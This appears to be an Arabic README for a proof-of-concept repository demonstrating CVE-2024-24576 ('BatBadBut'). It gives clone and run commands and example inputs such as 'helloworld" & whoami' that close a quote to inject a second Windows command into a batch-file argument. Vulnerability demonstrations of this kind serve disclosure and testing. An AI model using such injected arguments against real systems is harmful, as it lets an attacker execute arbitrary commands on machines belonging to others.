
PoC لثغرة CVE-2024-24576 "BatBadBut"
PoC لثغرة CVE-2024-24576 "BatBadBut"
بعد تشغيل السكربت، سيطلب منك إدخال وسيط (argument)، وسيتم تمرير هذا الوسيط إلى ملف البات. إذا أنهيت الوسيط بـ " وبعد ذلك & يمكنك تشغيل أي أمر في Windows. على سبيل المثال:
helloworld" & whoami
ونتيجة لذلك، ستحصل على مخرجات أمر whoami.
بالطبع في الوقت الفعلي لن يبدو الأمر بهذا الشكل، هذا مجرد PoC للثغرة.
استنسخ المستودع:
git clone https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut.git
تشغيل السكربت:
Python CVE-2024-24576.py
لجعلها تعمل، اكتب شيئًا وأغلقه بـ " ثم أضف "&" وأي أمر مثل calc.exe أو hostname أو whoami...
HelloWorld" & hostname
مخطط تدفق الثغرة والطريقة الممكنة لجعلها تعمل